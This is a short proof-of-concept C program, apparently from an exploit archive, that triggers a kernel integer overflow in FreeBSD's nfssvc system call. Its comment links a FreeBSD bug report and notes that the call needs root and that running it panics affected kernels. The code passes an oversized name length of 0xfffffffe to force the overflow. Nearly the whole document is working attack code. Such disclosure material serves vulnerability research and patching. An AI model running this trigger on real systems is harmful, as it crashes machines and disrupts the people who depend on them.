FreeBSD nfssvc system call integer overflow

nfssvc.c

/*
	PoC for FreeBSD kernel integer overflow in nfssvc system call
	Refer to bug report here: https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206626
	
	System call only accessible as root.
	
	Running this test will panic affected versions of FreeBSD.
	
	clang nfssvc.c -o n
	su
	./n
	
	- CTurt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/param.h>
#include <sys/mount.h>
#include <sys/time.h>
#include <nfsserver/nfs.h>
#include <unistd.h>

#define	NFSID_INITIALIZE	0x0001

#define	NFSSVC_IDNAME	0x00000200
#define	NFSSVC_NEWSTRUCT	0x20000000

struct nfsd_idargs {
	int		nid_flag;	/* Flags (see below) */
	uid_t		nid_uid;	/* user/group id */
	gid_t		nid_gid;
	int		nid_usermax;	/* Upper bound on user name cache */
	int		nid_usertimeout;/* User name timeout (minutes) */
	u_char		*nid_name;	/* Name */
	int		nid_namelen;	/* and its length */
	gid_t		*nid_grps;	/* and the list */
	int		nid_ngroup;	/* Size of groups list */
};

int main(void) {
	u_char *overflow = malloc(0x4000);
	memset(overflow, 'a', 0x4000);
	
	struct nfsd_idargs nid;
	
	nid.nid_flag = NFSID_INITIALIZE;
	nid.nid_name = overflow;
	nid.nid_namelen = 0xfffffffe;
	
	printf("Triggering...\n");
	
	int result = nfssvc(NFSSVC_IDNAME | NFSSVC_NEWSTRUCT, &nid);
	
	printf("Result: %d\n", result);
	printf("Errno: %d\n", errno);
	
	free(overflow);
	
	return 0;
}